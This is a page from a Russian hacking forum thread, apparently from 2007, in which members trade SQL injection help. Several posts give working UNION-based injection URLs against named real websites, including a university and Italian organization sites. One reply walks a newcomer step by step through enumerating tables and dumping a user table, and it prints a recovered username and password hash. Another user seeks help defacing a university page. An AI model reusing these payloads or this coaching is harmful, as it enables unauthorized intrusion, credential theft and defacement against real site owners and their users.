ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 37 из 1393 « Первая < 27 33 34 35 36 37 38 39 40 41 47871375371037 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #361  
Старый 28.11.2007, 16:49
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information  _schema.tables/*
что дальше делать не подскажите?
 
Ответить с цитированием

  #362  
Старый 28.11.2007, 17:07
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Цитата:
Сообщение от Mike 007  
что дальше делать не подскажите?
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_name),4,5+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
progettocompetence_it:areariservata_utenti
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=0x70726F676574746F636F6D706574656E63655F6974+and+table_name=0x617265617269736572766174615F7574656E7469+limit+1,1+--+
id
userid
password
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,password),4,5+from+progettocompetence_it.areariservata_utenti+limit+0,1+--+
1:Ilic:ff112557a3a0a4d1e74f56e0ac979467

Крути limit ....
 
Ответить с цитированием

  #363  
Старый 28.11.2007, 21:00
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
 
Ответить с цитированием

  #364  
Старый 28.11.2007, 21:09
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Цитата:
Сообщение от Mike 007  
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
Аналогично вышеизложенному.
 
Ответить с цитированием

  #365  
Старый 28.11.2007, 21:45
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию
а +where+co lumn_name=0x70617373776F7264+--+ откуда?
и
Код:
+where+table_schema=0x70726F676574  746F636F6D706574656E63655F6974+and+table_name=0x61  7265617269736572766174615F7574656E7469+limit+1,1+--+
откуда взяось?
Последний раз редактировалось Mike 007; 28.11.2007 в 21:54..
 
Ответить с цитированием

  #366  
Старый 28.11.2007, 21:47
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Цитата:
Сообщение от Mike 007  
а +where+co lumn_name=0x70617373776F7264+--+ откуда?
Это hex представление столбца password
 
Ответить с цитированием

  #367  
Старый 29.11.2007, 08:01
Аватар для 77oody
77oody
Новичок
Регистрация: 28.11.2007
Сообщений: 1
Провел на форуме:
20520

Репутация: 0
По умолчанию
Код:
http://terminovo.com/index.php?main_page=products_general_i nfo &products_id=99999999
Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
Последний раз редактировалось 77oody; 29.11.2007 в 08:03..
 
Ответить с цитированием

  #368  
Старый 29.11.2007, 10:37
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
Цитата:
Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
При чем здесь хекс или char? Там же инклуд(и то маловероятно что провернешь), а не скуля
 
Ответить с цитированием

  #369  
Старый 30.11.2007, 04:43
Аватар для noneim
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
Провел на форуме:
33325

Репутация: 0
По умолчанию
Код:
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SELECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20--

Исключительно в образовательных целях хотелось бы изменить вот эту страничку
Код:
http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227
имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...
 
Ответить с цитированием

  #370  
Старый 30.11.2007, 09:04
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
noneim
Цитата:
имена таблиц похоже только методом тыка..
можно и не методом тыка
Цитата:
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=(SELECT%20TOP%201%20TABLE _SCHEMA%20FROM%20INFORMATION_SCHEMA.TABLES)
дальше наверно сам разберешся...

на всякий случай прочитай:
https://forum.antichat.ru/showthread.php?t=30501
 
Ответить с цитированием
Ответ
Страница 37 из 1393 « Первая < 27 33 34 35 36 37 38 39 40 41 47871375371037 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ